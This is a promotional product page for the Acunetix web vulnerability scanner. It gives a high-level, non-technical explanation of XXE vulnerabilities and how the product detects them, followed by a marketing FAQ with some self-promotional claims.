XXE Scanner

XML External Entity (XXE) is a type of Server-side Request Forgery (SSRF) vulnerability that allows an attacker to cause Denial of Service (DoS) and access local files or remote hosts and services by abusing a widely available but rarely used feature in XML parsers. It’s also possible to use XXE vulnerabilities to conduct port scanning on the internal network of a web application, and in some cases, XXE can be used as a step in a multi-stage attack that may lead to remote code execution. Most XXE attacks can be avoided with a correctly configured XML parser used by an application and are therefore not always difficult to fix, however finding them in large codebases could be challenging without the right tools, especially since a lot of XXE vulnerabilities can only be detected using out-of-band (OOB) testing. Acunetix is a web application vulnerability scanner and as part of the myriad of vulnerability test it performs, it looks for advanced variations of XXE vulnerabilities, including blind XXE through the use of the Acunetix AcuMonitor technology.

While many web vulnerability scanners can find low-hanging XXE, Acunetix goes well beyond the basics thanks to its advanced crawler and JavaScript engine called DeepScan. Thanks to DeepScan, Acunetix also has full support for modern single-page applications (SPAs) and can understand and fully test applications that rely on JavaScript frameworks like React, Angular, Ember, and Vue. This means that Acunetix can understand an underpinning RESTful API when crawling a SPA. Since Acunetix can not just understand JSON and XML, it can build a correct input scheme (an internal representation of web application input), which it may then rigorously test for XXE and other attacks such as SQL Injection, Cross-site Scripting (XSS), and HTTP host header attacks.

In addition to being a fully automated black box (no knowledge of backend code) vulnerability scanner, Acunetix also provides AcuSensor as part of its standard offering. AcuSensor is a an optional sensor for Java, ASP.NET, and PHP applications that can easily be deployed on the application backend to analyze source code while it is in execution by the scanner. This type of testing is known as gray box testing since it combines the best of both worlds from black box testing and white box testing. When testing for XXE vulnerabilities, Acunetix AcuSensor increases the accuracy of a scan since it has access to the code on the backend. With AcuSensor, the Acunetix vulnerability scanner may also test pages that would not otherwise be discovered via crawling thanks to the AcuSensor backend crawl technology.

Frequently asked questions

What is XXE?

XXE (XML external entity) is a class of vulnerabilities in web applications and attacks that exploit these vulnerabilities. XXE vulnerabilities allow the attacker to inject XML code into the application through regular user input. This XML code is then processed by the web application with potentially dangerous results.

How dangerous is XXE?

XXE can lead to denial-of-service attacks, theft of information, and even to other attacks such as SSRF (server-side request forgery) or RCE (remote code execution). Therefore, it can be very dangerous.

See how an attacker can steal confidential information using XXE.

How do I check if I have XXE issues?

The only way to check if you have XXE issues is to use a vulnerability scanner. Several scanners are able to detect this type of attack but Acunetix is one of the very few that can also prove it. This means that Acunetix will, for example, show you that it accessed a confidential file from your web application using XXE.

Read how Acunetix proves that vulnerabilities are real.

Why should I choose Acunetix to combat XXE?

Acunetix will protect you not only from XXE but from all other types of web vulnerabilities. Acunetix also fully integrates with a network scanner so you can perform web and network scans using the same interface. Acunetix is not only the fastest scanner on the market but also the only one available on platforms other than Windows or the cloud.

Learn more about Acunetix Premium and its capabilities.